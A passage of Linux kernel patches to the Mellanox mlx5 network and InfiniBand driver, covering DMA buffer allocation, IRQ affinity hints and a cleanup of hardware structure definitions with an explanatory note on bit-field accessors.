tipc_sk_remove(tsk); if (tsk->connected) { skb = tipc_msg_create(TIPC_CRITICAL_IMPORTANCE, From 64ffaa2159b752e6c263dc57eaaaed7367d37493 Mon Sep 17 00:00:00 2001 From: Amir Vadai Date: Thu, 28 May 2015 22:28:38 +0300 Subject: [PATCH 492/872] net/mlx5_core,mlx5_ib: Do not use vmap() on coherent memory As David Daney pointed in mlx4_core driver [1], mlx5_core is also misusing the DMA-API. This patch is removing the code that vmap() memory allocated by dma_alloc_coherent(). After this patch, users of this drivers might fail allocating resources on memory fragmeneted systems. 
This will be fixed later on. [1] - https://patchwork.ozlabs.org/patch/458531/ CC: David Daney Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- drivers/infiniband/hw/mlx5/cq.c | 3 +- drivers/infiniband/hw/mlx5/qp.c | 2 +- drivers/infiniband/hw/mlx5/srq.c | 2 +- .../net/ethernet/mellanox/mlx5/core/alloc.c | 96 ++++--------------- drivers/net/ethernet/mellanox/mlx5/core/eq.c | 3 +- include/linux/mlx5/driver.h | 9 +- 6 files changed, 22 insertions(+), 93 deletions(-) diff --git a/drivers/infiniband/hw/mlx5/cq.c b/drivers/infiniband/hw/mlx5/cq.c index 2ee6b1051975..4e88b18cf62e 100644 --- a/drivers/infiniband/hw/mlx5/cq.c +++ b/drivers/infiniband/hw/mlx5/cq.c @@ -590,8 +590,7 @@ static int alloc_cq_buf(struct mlx5_ib_dev *dev, struct mlx5_ib_cq_buf *buf, { int err; - err = mlx5_buf_alloc(dev->mdev, nent * cqe_size, - PAGE_SIZE * 2, &buf->buf); + err = mlx5_buf_alloc(dev->mdev, nent * cqe_size, &buf->buf); if (err) return err; diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c index d35f62d4f4c5..426eb88dfa49 100644 --- a/drivers/infiniband/hw/mlx5/qp.c +++ b/drivers/infiniband/hw/mlx5/qp.c @@ -768,7 +768,7 @@ static int create_kernel_qp(struct mlx5_ib_dev *dev, qp->sq.offset = qp->rq.wqe_cnt << qp->rq.wqe_shift; qp->buf_size = err + (qp->rq.wqe_cnt << qp->rq.wqe_shift); - err = mlx5_buf_alloc(dev->mdev, qp->buf_size, PAGE_SIZE * 2, &qp->buf); + err = mlx5_buf_alloc(dev->mdev, qp->buf_size, &qp->buf); if (err) { mlx5_ib_dbg(dev, "err %d\n", err); goto err_uuar; diff --git a/drivers/infiniband/hw/mlx5/srq.c b/drivers/infiniband/hw/mlx5/srq.c index 02d77a29764d..4242e1ded868 100644 --- a/drivers/infiniband/hw/mlx5/srq.c +++ b/drivers/infiniband/hw/mlx5/srq.c @@ -165,7 +165,7 @@ static int create_srq_kernel(struct mlx5_ib_dev *dev, struct mlx5_ib_srq *srq, return err; } - if (mlx5_buf_alloc(dev->mdev, buf_size, PAGE_SIZE * 2, &srq->buf)) { + if (mlx5_buf_alloc(dev->mdev, buf_size, &srq->buf)) { mlx5_ib_dbg(dev, "buf alloc failed\n"); err = -ENOMEM; goto err_db; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/alloc.c b/drivers/net/ethernet/mellanox/mlx5/core/alloc.c index ac0f7bf4be95..0715b497511f 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/alloc.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/alloc.c @@ -42,95 +42,36 @@ #include "mlx5_core.h" /* Handling for queue buffers -- we allocate a bunch of memory and - * register it in a memory region at HCA virtual address 0. If the - * requested size is > max_direct, we split the allocation into - * multiple pages, so we don't require too much contiguous memory. + * register it in a memory region at HCA virtual address 0. 
*/ -int mlx5_buf_alloc(struct mlx5_core_dev *dev, int size, int max_direct, - struct mlx5_buf *buf) +int mlx5_buf_alloc(struct mlx5_core_dev *dev, int size, struct mlx5_buf *buf) { dma_addr_t t; buf->size = size; - if (size <= max_direct) { - buf->nbufs = 1; - buf->npages = 1; - buf->page_shift = (u8)get_order(size) + PAGE_SHIFT; - buf->direct.buf = dma_zalloc_coherent(&dev->pdev->dev, - size, &t, GFP_KERNEL); - if (!buf->direct.buf) - return -ENOMEM; - - buf->direct.map = t; - - while (t & ((1 << buf->page_shift) - 1)) { - --buf->page_shift; - buf->npages *= 2; - } - } else { - int i; - - buf->direct.buf = NULL; - buf->nbufs = (size + PAGE_SIZE - 1) / PAGE_SIZE; - buf->npages = buf->nbufs; - buf->page_shift = PAGE_SHIFT; - buf->page_list = kcalloc(buf->nbufs, sizeof(*buf->page_list), - GFP_KERNEL); - if (!buf->page_list) - return -ENOMEM; - - for (i = 0; i < buf->nbufs; i++) { - buf->page_list[i].buf = - dma_zalloc_coherent(&dev->pdev->dev, PAGE_SIZE, - &t, GFP_KERNEL); - if (!buf->page_list[i].buf) - goto err_free; - - buf->page_list[i].map = t; - } - - if (BITS_PER_LONG == 64) { - struct page **pages; - pages = kmalloc(sizeof(*pages) * buf->nbufs, GFP_KERNEL); - if (!pages) - goto err_free; - for (i = 0; i < buf->nbufs; i++) - pages[i] = virt_to_page(buf->page_list[i].buf); - buf->direct.buf = vmap(pages, buf->nbufs, VM_MAP, PAGE_KERNEL); - kfree(pages); - if (!buf->direct.buf) - goto err_free; - } - } + buf->npages = 1; + buf->page_shift = (u8)get_order(size) + PAGE_SHIFT; + buf->direct.buf = dma_zalloc_coherent(&dev->pdev->dev, + size, &t, GFP_KERNEL); + if (!buf->direct.buf) + return -ENOMEM; - return 0; + buf->direct.map = t; -err_free: - mlx5_buf_free(dev, buf); + while (t & ((1 << buf->page_shift) - 1)) { + --buf->page_shift; + buf->npages *= 2; + } - return -ENOMEM; + return 0; } EXPORT_SYMBOL_GPL(mlx5_buf_alloc); void mlx5_buf_free(struct mlx5_core_dev *dev, struct mlx5_buf *buf) { - int i; - - if (buf->nbufs == 1) - dma_free_coherent(&dev->pdev->dev, buf->size, buf->direct.buf, - buf->direct.map); - else { - if (BITS_PER_LONG == 64) - vunmap(buf->direct.buf); - - for (i = 0; i < buf->nbufs; i++) - if (buf->page_list[i].buf) - dma_free_coherent(&dev->pdev->dev, PAGE_SIZE, - buf->page_list[i].buf, - buf->page_list[i].map); - kfree(buf->page_list); - } + dma_free_coherent(&dev->pdev->dev, buf->size, buf->direct.buf, + buf->direct.map); } EXPORT_SYMBOL_GPL(mlx5_buf_free); @@ -230,10 +171,7 @@ void mlx5_fill_page_array(struct mlx5_buf *buf, __be64 *pas) int i; for (i = 0; i < buf->npages; i++) { - if (buf->nbufs == 1) - addr = buf->direct.map + (i << buf->page_shift); - else - addr = buf->page_list[i].map; + addr = buf->direct.map + (i << buf->page_shift); pas[i] = cpu_to_be64(addr); } diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eq.c b/drivers/net/ethernet/mellanox/mlx5/core/eq.c index 58800e4f3958..3f511bd84489 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/eq.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/eq.c @@ -346,8 +346,7 @@ int mlx5_create_map_eq(struct mlx5_core_dev *dev, struct mlx5_eq *eq, u8 vecidx, int inlen; eq->nent = roundup_pow_of_two(nent + MLX5_NUM_SPARE_EQE); - err = mlx5_buf_alloc(dev, eq->nent * MLX5_EQE_SIZE, 2 * PAGE_SIZE, - &eq->buf); + err = mlx5_buf_alloc(dev, eq->nent * MLX5_EQE_SIZE, &eq->buf); if (err) return err; diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 9a90e7523dc2..c4cf25ffcc16 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -334,8 +334,6 @@ struct mlx5_buf_list { 
struct mlx5_buf { struct mlx5_buf_list direct; - struct mlx5_buf_list *page_list; - int nbufs; int npages; int size; u8 page_shift; @@ -586,11 +584,7 @@ struct mlx5_pas { static inline void *mlx5_buf_offset(struct mlx5_buf *buf, int offset) { - if (likely(BITS_PER_LONG == 64 || buf->nbufs == 1)) return buf->direct.buf + offset; - else - return buf->page_list[offset >> PAGE_SHIFT].buf + - (offset & (PAGE_SIZE - 1)); } extern struct workqueue_struct *mlx5_core_wq; @@ -669,8 +663,7 @@ void mlx5_health_cleanup(void); void __init mlx5_health_init(void); void mlx5_start_health_poll(struct mlx5_core_dev *dev); void mlx5_stop_health_poll(struct mlx5_core_dev *dev); -int mlx5_buf_alloc(struct mlx5_core_dev *dev, int size, int max_direct, - struct mlx5_buf *buf); +int mlx5_buf_alloc(struct mlx5_core_dev *dev, int size, struct mlx5_buf *buf); void mlx5_buf_free(struct mlx5_core_dev *dev, struct mlx5_buf *buf); struct mlx5_cmd_mailbox *mlx5_alloc_cmd_mailbox_chain(struct mlx5_core_dev *dev, gfp_t flags, int npages); From db058a186f98b057c19c42f7b10d9a96fd3b5d59 Mon Sep 17 00:00:00 2001 From: Saeed Mahameed Date: Thu, 28 May 2015 22:28:39 +0300 Subject: [PATCH 493/872] net/mlx5_core: Set irq affinity hints Preparation for upcoming ethernet driver. - Move msix array from eq_table struct to priv since its not related to eq_table - Intorduce irq_info struct to hold all irq information - Move name from mlx5_eq to irq_info struct since it is irq property. - Set IRQ affinity hints Signed-off-by: Achiad Shochat Signed-off-by: Rana Shahout Signed-off-by: Saeed Mahameed Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/eq.c | 16 +-- .../net/ethernet/mellanox/mlx5/core/main.c | 111 ++++++++++++++++-- include/linux/mlx5/driver.h | 11 +- 3 files changed, 117 insertions(+), 21 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eq.c b/drivers/net/ethernet/mellanox/mlx5/core/eq.c index 3f511bd84489..516efc25fc4f 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/eq.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/eq.c @@ -339,7 +339,7 @@ static void init_eq_buf(struct mlx5_eq *eq) int mlx5_create_map_eq(struct mlx5_core_dev *dev, struct mlx5_eq *eq, u8 vecidx, int nent, u64 mask, const char *name, struct mlx5_uar *uar) { - struct mlx5_eq_table *table = &dev->priv.eq_table; + struct mlx5_priv *priv = &dev->priv; struct mlx5_create_eq_mbox_in *in; struct mlx5_create_eq_mbox_out out; int err; @@ -377,14 +377,15 @@ int mlx5_create_map_eq(struct mlx5_core_dev *dev, struct mlx5_eq *eq, u8 vecidx, goto err_in; } - snprintf(eq->name, MLX5_MAX_EQ_NAME, "%s@pci:%s", + snprintf(priv->irq_info[vecidx].name, MLX5_MAX_IRQ_NAME, "%s@pci:%s", name, pci_name(dev->pdev)); + eq->eqn = out.eq_number; eq->irqn = vecidx; eq->dev = dev; eq->doorbell = uar->map + MLX5_EQ_DOORBEL_OFFSET; - err = request_irq(table->msix_arr[vecidx].vector, mlx5_msix_handler, 0, - eq->name, eq); + err = request_irq(priv->msix_arr[vecidx].vector, mlx5_msix_handler, 0, + priv->irq_info[vecidx].name, eq); if (err) goto err_eq; @@ -400,7 +401,7 @@ int mlx5_create_map_eq(struct mlx5_core_dev *dev, struct mlx5_eq *eq, u8 vecidx, return 0; err_irq: - free_irq(table->msix_arr[vecidx].vector, eq); + free_irq(priv->msix_arr[vecidx].vector, eq); err_eq: mlx5_cmd_destroy_eq(dev, eq->eqn); @@ -416,16 +417,15 @@ EXPORT_SYMBOL_GPL(mlx5_create_map_eq); int mlx5_destroy_unmap_eq(struct mlx5_core_dev *dev, struct mlx5_eq *eq) { - struct mlx5_eq_table *table = &dev->priv.eq_table; int err; 
mlx5_debug_eq_remove(dev, eq); - free_irq(table->msix_arr[eq->irqn].vector, eq); + free_irq(dev->priv.msix_arr[eq->irqn].vector, eq); err = mlx5_cmd_destroy_eq(dev, eq->eqn); if (err) mlx5_core_warn(dev, "failed to destroy a previously created eq: eqn %d\n", eq->eqn); - synchronize_irq(table->msix_arr[eq->irqn].vector); + synchronize_irq(dev->priv.msix_arr[eq->irqn].vector); mlx5_buf_free(dev, &eq->buf); return err; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c index 28425e5ea91f..55085b01b4ce 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c @@ -38,6 +38,7 @@ #include #include #include +#include #include #include #include @@ -208,7 +209,8 @@ static void release_bar(struct pci_dev *pdev) static int mlx5_enable_msix(struct mlx5_core_dev *dev) { - struct mlx5_eq_table *table = &dev->priv.eq_table; + struct mlx5_priv *priv = &dev->priv; + struct mlx5_eq_table *table = &priv->eq_table; int num_eqs = 1 << dev->caps.gen.log_max_eq; int nvec; int i; @@ -218,14 +220,16 @@ static int mlx5_enable_msix(struct mlx5_core_dev *dev) if (nvec <= MLX5_EQ_VEC_COMP_BASE) return -ENOMEM; - table->msix_arr = kzalloc(nvec * sizeof(*table->msix_arr), GFP_KERNEL); - if (!table->msix_arr) - return -ENOMEM; + priv->msix_arr = kcalloc(nvec, sizeof(*priv->msix_arr), GFP_KERNEL); + + priv->irq_info = kcalloc(nvec, sizeof(*priv->irq_info), GFP_KERNEL); + if (!priv->msix_arr || !priv->irq_info) + goto err_free_msix; for (i = 0; i < nvec; i++) - table->msix_arr[i].entry = i; + priv->msix_arr[i].entry = i; - nvec = pci_enable_msix_range(dev->pdev, table->msix_arr, + nvec = pci_enable_msix_range(dev->pdev, priv->msix_arr, MLX5_EQ_VEC_COMP_BASE + 1, nvec); if (nvec < 0) return nvec; @@ -233,14 +237,20 @@ static int mlx5_enable_msix(struct mlx5_core_dev *dev) table->num_comp_vectors = nvec - MLX5_EQ_VEC_COMP_BASE; return 0; + +err_free_msix: + kfree(priv->irq_info); + kfree(priv->msix_arr); + return -ENOMEM; } static void mlx5_disable_msix(struct mlx5_core_dev *dev) { - struct mlx5_eq_table *table = &dev->priv.eq_table; + struct mlx5_priv *priv = &dev->priv; pci_disable_msix(dev->pdev); - kfree(table->msix_arr); + kfree(priv->irq_info); + kfree(priv->msix_arr); } struct mlx5_reg_host_endianess { @@ -507,6 +517,77 @@ static int mlx5_core_disable_hca(struct mlx5_core_dev *dev) return 0; } +static int mlx5_irq_set_affinity_hint(struct mlx5_core_dev *mdev, int i) +{ + struct mlx5_priv *priv = &mdev->priv; + struct msix_entry *msix = priv->msix_arr; + int irq = msix[i + MLX5_EQ_VEC_COMP_BASE].vector; + int numa_node = dev_to_node(&mdev->pdev->dev); + int err; + + if (!zalloc_cpumask_var(&priv->irq_info[i].mask, GFP_KERNEL)) { + mlx5_core_warn(mdev, "zalloc_cpumask_var failed"); + return -ENOMEM; + } + + err = cpumask_set_cpu_local_first(i, numa_node, priv->irq_info[i].mask); + if (err) { + mlx5_core_warn(mdev, "cpumask_set_cpu_local_first failed"); + goto err_clear_mask; + } + + err = irq_set_affinity_hint(irq, priv->irq_info[i].mask); + if (err) { + mlx5_core_warn(mdev, "irq_set_affinity_hint failed,irq 0x%.4x", + irq); + goto err_clear_mask; + } + + return 0; + +err_clear_mask: + free_cpumask_var(priv->irq_info[i].mask); + return err; +} + +static void mlx5_irq_clear_affinity_hint(struct mlx5_core_dev *mdev, int i) +{ + struct mlx5_priv *priv = &mdev->priv; + struct msix_entry *msix = priv->msix_arr; + int irq = msix[i + MLX5_EQ_VEC_COMP_BASE].vector; + + irq_set_affinity_hint(irq, NULL); + 
free_cpumask_var(priv->irq_info[i].mask); +} + +static int mlx5_irq_set_affinity_hints(struct mlx5_core_dev *mdev) +{ + int err; + int i; + + for (i = 0; i < mdev->priv.eq_table.num_comp_vectors; i++) { + err = mlx5_irq_set_affinity_hint(mdev, i); + if (err) + goto err_out; + } + + return 0; + +err_out: + for (i--; i >= 0; i--) + mlx5_irq_clear_affinity_hint(mdev, i); + + return err; +} + +static void mlx5_irq_clear_affinity_hints(struct mlx5_core_dev *mdev) +{ + int i; + + for (i = 0; i < mdev->priv.eq_table.num_comp_vectors; i++) + mlx5_irq_clear_affinity_hint(mdev, i); +} + int mlx5_vector2eqn(struct mlx5_core_dev *dev, int vector, int *eqn, int *irqn) { struct mlx5_eq_table *table = &dev->priv.eq_table; @@ -549,7 +630,7 @@ static void free_comp_eqs(struct mlx5_core_dev *dev) static int alloc_comp_eqs(struct mlx5_core_dev *dev) { struct mlx5_eq_table *table = &dev->priv.eq_table; - char name[MLX5_MAX_EQ_NAME]; + char name[MLX5_MAX_IRQ_NAME]; struct mlx5_eq *eq; int ncomp_vec; int nent; @@ -566,7 +647,7 @@ static int alloc_comp_eqs(struct mlx5_core_dev *dev) goto clean; } - snprintf(name, MLX5_MAX_EQ_NAME, "mlx5_comp%d", i); + snprintf(name, MLX5_MAX_IRQ_NAME, "mlx5_comp%d", i); err = mlx5_create_map_eq(dev, eq, i + MLX5_EQ_VEC_COMP_BASE, nent, 0, name, &dev->priv.uuari.uars[0]); @@ -730,6 +811,12 @@ static int mlx5_dev_init(struct mlx5_core_dev *dev, struct pci_dev *pdev) goto err_stop_eqs; } + err = mlx5_irq_set_affinity_hints(dev); + if (err) { + dev_err(&pdev->dev, "Failed to alloc affinity hint cpumask\n"); + goto err_free_comp_eqs; + } + MLX5_INIT_DOORBELL_LOCK(&priv->cq_uar_lock); mlx5_init_cq_table(dev); @@ -739,6 +826,9 @@ static int mlx5_dev_init(struct mlx5_core_dev *dev, struct pci_dev *pdev) return 0; +err_free_comp_eqs: + free_comp_eqs(dev); + err_stop_eqs: mlx5_stop_eqs(dev); @@ -793,6 +883,7 @@ static void mlx5_dev_cleanup(struct mlx5_core_dev *dev) mlx5_cleanup_srq_table(dev); mlx5_cleanup_qp_table(dev); mlx5_cleanup_cq_table(dev); + mlx5_irq_clear_affinity_hints(dev); free_comp_eqs(dev); mlx5_stop_eqs(dev); mlx5_free_uuars(dev, &priv->uuari); diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index c4cf25ffcc16..9e8979502826 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -85,7 +85,7 @@ enum { }; enum { - MLX5_MAX_EQ_NAME = 32 + MLX5_MAX_IRQ_NAME = 32 }; enum { @@ -349,7 +349,6 @@ struct mlx5_eq { u8 eqn; int nent; u64 mask; - char name[MLX5_MAX_EQ_NAME]; struct list_head list; int index; struct mlx5_rsc_debug *dbg; @@ -412,7 +411,6 @@ struct mlx5_eq_table { struct mlx5_eq pages_eq; struct mlx5_eq async_eq; struct mlx5_eq cmd_eq; - struct msix_entry *msix_arr; int num_comp_vectors; /* protect EQs list */ @@ -465,9 +463,16 @@ struct mlx5_mr_table { struct radix_tree_root tree; }; +struct mlx5_irq_info { + cpumask_var_t mask; + char name[MLX5_MAX_IRQ_NAME]; +}; + struct mlx5_priv { char name[MLX5_MAX_NAME_LEN]; struct mlx5_eq_table eq_table; + struct msix_entry *msix_arr; + struct mlx5_irq_info *irq_info; struct mlx5_uuar_info uuari; MLX5_DECLARE_DOORBELL_LOCK(cq_uar_lock); From e281682bf29438848daac11627216bceb1507b71 Mon Sep 17 00:00:00 2001 From: Saeed Mahameed Date: Thu, 28 May 2015 22:28:40 +0300 Subject: [PATCH 494/872] net/mlx5_core: HW data structs/types definitions cleanup mlx5_ifc.h was heavily modified here since it is now generated by a script from the device specification (PRM rev 0.25). This specification is backward compatible to existing hardware. 
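As an orientation note for readers of the generated header: every "u8 <name>[0xN]" member in mlx5_ifc.h stands for an N-bit field in a big-endian structure, and the MLX5_GET()/MLX5_SET() accessors in include/linux/mlx5/device.h turn those declared widths into dword and bit offsets. A minimal userspace sketch of the same idea follows; ifc_get_bits(), its raw-offset interface, and the standard headers are illustrative assumptions, not part of the driver, and the helper assumes a field narrower than 32 bits that does not cross a 32-bit word boundary.

#include <stdint.h>
#include <arpa/inet.h>	/* ntohl() plays the role of be32_to_cpu() in this sketch */

/*
 * Read a 'width'-bit field that starts 'bit_off' bits into a big-endian
 * structure laid out as in mlx5_ifc.h.  Bit offsets count from the most
 * significant bit of the structure, exactly as the u8 name[0xN] widths
 * accumulate.
 */
static uint32_t ifc_get_bits(const void *buf, unsigned int bit_off,
			     unsigned int width)
{
	const uint32_t *words = buf;
	uint32_t word = ntohl(words[bit_off / 32]);
	unsigned int shift = 32 - (bit_off % 32) - width;

	return (word >> shift) & ((1u << width) - 1);
}

For example, srq_receive in mlx5_ifc_odp_per_transport_service_cap_bits below starts five bits into the structure, so ifc_get_bits(caps, 5, 1) would read it in this model; the driver itself uses the MLX5_GET()/MLX5_SET() macros with the generated per-field offsets rather than open-coded numbers.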
Some structures/fields were added here in order to enable the Ethernet functionality of the driver. Signed-off-by: Saeed Mahameed Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/cmd.c | 17 +- drivers/net/ethernet/mellanox/mlx5/core/fw.c | 2 +- .../net/ethernet/mellanox/mlx5/core/main.c | 7 +- drivers/net/ethernet/mellanox/mlx5/core/mcg.c | 2 +- drivers/net/ethernet/mellanox/mlx5/core/uar.c | 37 + include/linux/mlx5/device.h | 113 +- include/linux/mlx5/driver.h | 4 +- include/linux/mlx5/mlx5_ifc.h | 6608 ++++++++++++++++- include/linux/mlx5/qp.h | 25 + 9 files changed, 6705 insertions(+), 110 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c index e3273faf4568..2f22cd2de2b0 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c @@ -390,8 +390,17 @@ const char *mlx5_command_str(int command) case MLX5_CMD_OP_ARM_RQ: return "ARM_RQ"; - case MLX5_CMD_OP_RESIZE_SRQ: - return "RESIZE_SRQ"; + case MLX5_CMD_OP_CREATE_XRC_SRQ: + return "CREATE_XRC_SRQ"; + + case MLX5_CMD_OP_DESTROY_XRC_SRQ: + return "DESTROY_XRC_SRQ"; + + case MLX5_CMD_OP_QUERY_XRC_SRQ: + return "QUERY_XRC_SRQ"; + + case MLX5_CMD_OP_ARM_XRC_SRQ: + return "ARM_XRC_SRQ"; case MLX5_CMD_OP_ALLOC_PD: return "ALLOC_PD"; @@ -408,8 +417,8 @@ const char *mlx5_command_str(int command) case MLX5_CMD_OP_ATTACH_TO_MCG: return "ATTACH_TO_MCG"; - case MLX5_CMD_OP_DETACH_FROM_MCG: - return "DETACH_FROM_MCG"; + case MLX5_CMD_OP_DETTACH_FROM_MCG: + return "DETTACH_FROM_MCG"; case MLX5_CMD_OP_ALLOC_XRCD: return "ALLOC_XRCD"; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw.c b/drivers/net/ethernet/mellanox/mlx5/core/fw.c index 4b4cda3bcc5f..ef9b7695decd 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/fw.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/fw.c @@ -95,7 +95,7 @@ int mlx5_query_odp_caps(struct mlx5_core_dev *dev, struct mlx5_odp_caps *caps) goto out; } - memcpy(caps, MLX5_ADDR_OF(query_hca_cap_out, out, capability_struct), + memcpy(caps, MLX5_ADDR_OF(query_hca_cap_out, out, capability), sizeof(*caps)); mlx5_core_dbg(dev, "on-demand paging capabilities:\nrc: %08x\nuc: %08x\nud: %08x\n", diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c index 55085b01b4ce..a652cb93ceaa 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c @@ -319,8 +319,7 @@ static void fw2drv_caps(struct mlx5_caps *caps, void *out) gen->max_srq_wqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_srq_sz); gen->max_wqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_qp_sz); gen->log_max_qp = MLX5_GET_PR(cmd_hca_cap, out, log_max_qp); - gen->log_max_strq = MLX5_GET_PR(cmd_hca_cap, out, log_max_strq_sz); - gen->log_max_srq = MLX5_GET_PR(cmd_hca_cap, out, log_max_srqs); + gen->log_max_srq = MLX5_GET_PR(cmd_hca_cap, out, log_max_srq); gen->max_cqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_cq_sz); gen->log_max_cq = MLX5_GET_PR(cmd_hca_cap, out, log_max_cq); gen->max_eqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_eq_sz); @@ -391,7 +390,7 @@ int mlx5_core_get_caps(struct mlx5_core_dev *dev, struct mlx5_caps *caps, goto query_ex; } mlx5_core_dbg(dev, "%s\n", caps_opmod_str(opmod)); - fw2drv_caps(caps, MLX5_ADDR_OF(query_hca_cap_out, out, capability_struct)); + fw2drv_caps(caps, MLX5_ADDR_OF(query_hca_cap_out, out, capability)); query_ex: kfree(out); @@ -453,7 +452,7 @@ static int 
handle_hca_cap(struct mlx5_core_dev *dev) /* disable checksum */ cur_caps->gen.flags &= ~MLX5_DEV_CAP_FLAG_CMDIF_CSUM; - copy_rw_fields(MLX5_ADDR_OF(set_hca_cap_in, set_ctx, hca_capability_struct), + copy_rw_fields(MLX5_ADDR_OF(set_hca_cap_in, set_ctx, capability), cur_caps); err = set_caps(dev, set_ctx, set_sz); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/mcg.c b/drivers/net/ethernet/mellanox/mlx5/core/mcg.c index d79fd85d1dd5..d5a0c2d61a18 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/mcg.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/mcg.c @@ -91,7 +91,7 @@ int mlx5_core_detach_mcg(struct mlx5_core_dev *dev, union ib_gid *mgid, u32 qpn) memset(&in, 0, sizeof(in)); memset(&out, 0, sizeof(out)); - in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_DETACH_FROM_MCG); + in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_DETTACH_FROM_MCG); memcpy(in.gid, mgid, sizeof(*mgid)); in.qpn = cpu_to_be32(qpn); err = mlx5_cmd_exec(dev, &in, sizeof(in), &out, sizeof(out)); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/uar.c b/drivers/net/ethernet/mellanox/mlx5/core/uar.c index 5a89bb1d678a..ba58f6d7c761 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/uar.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/uar.c @@ -223,3 +223,40 @@ int mlx5_free_uuars(struct mlx5_core_dev *dev, struct mlx5_uuar_info *uuari) return 0; } + +int mlx5_alloc_map_uar(struct mlx5_core_dev *mdev, struct mlx5_uar *uar) +{ + phys_addr_t pfn; + phys_addr_t uar_bar_start; + int err; + + err = mlx5_cmd_alloc_uar(mdev, &uar->index); + if (err) { + mlx5_core_warn(mdev, "mlx5_cmd_alloc_uar() failed, %d\n", err); + return err; + } + + uar_bar_start = pci_resource_start(mdev->pdev, 0); + pfn = (uar_bar_start >> PAGE_SHIFT) + uar->index; + uar->map = ioremap(pfn << PAGE_SHIFT, PAGE_SIZE); + if (!uar->map) { + mlx5_core_warn(mdev, "ioremap() failed, %d\n", err); + err = -ENOMEM; + goto err_free_uar; + } + + return 0; + +err_free_uar: + mlx5_cmd_free_uar(mdev, uar->index); + + return err; +} +EXPORT_SYMBOL(mlx5_alloc_map_uar); + +void mlx5_unmap_free_uar(struct mlx5_core_dev *mdev, struct mlx5_uar *uar) +{ + iounmap(uar->map); + mlx5_cmd_free_uar(mdev, uar->index); +} +EXPORT_SYMBOL(mlx5_unmap_free_uar); diff --git a/include/linux/mlx5/device.h b/include/linux/mlx5/device.h index abf65c790421..feebed7b392b 100644 --- a/include/linux/mlx5/device.h +++ b/include/linux/mlx5/device.h @@ -35,6 +35,7 @@ #include #include +#include #if defined(__LITTLE_ENDIAN) #define MLX5_SET_HOST_ENDIANNESS 0 @@ -70,6 +71,14 @@ << __mlx5_dw_bit_off(typ, fld))); \ } while (0) +#define MLX5_SET_TO_ONES(typ, p, fld) do { \ + BUILD_BUG_ON(__mlx5_st_sz_bits(typ) % 32); \ + *((__be32 *)(p) + __mlx5_dw_off(typ, fld)) = \ + cpu_to_be32((be32_to_cpu(*((__be32 *)(p) + __mlx5_dw_off(typ, fld))) & \ + (~__mlx5_dw_mask(typ, fld))) | ((__mlx5_mask(typ, fld)) \ + << __mlx5_dw_bit_off(typ, fld))); \ +} while (0) + #define MLX5_GET(typ, p, fld) ((be32_to_cpu(*((__be32 *)(p) +\ __mlx5_dw_off(typ, fld))) >> __mlx5_dw_bit_off(typ, fld)) & \ __mlx5_mask(typ, fld)) @@ -264,6 +273,7 @@ enum { MLX5_OPCODE_RDMA_WRITE_IMM = 0x09, MLX5_OPCODE_SEND = 0x0a, MLX5_OPCODE_SEND_IMM = 0x0b, + MLX5_OPCODE_LSO = 0x0e, MLX5_OPCODE_RDMA_READ = 0x10, MLX5_OPCODE_ATOMIC_CS = 0x11, MLX5_OPCODE_ATOMIC_FA = 0x12, @@ -541,6 +551,10 @@ struct mlx5_cmd_prot_block { u8 sig; }; +enum { + MLX5_CQE_SYND_FLUSHED_IN_ERROR = 5, +}; + struct mlx5_err_cqe { u8 rsvd0[32]; __be32 srqn; @@ -554,13 +568,22 @@ struct mlx5_err_cqe { }; struct mlx5_cqe64 { - u8 rsvd0[17]; + u8 rsvd0[4]; + u8 lro_tcppsh_abort_dupack; + 
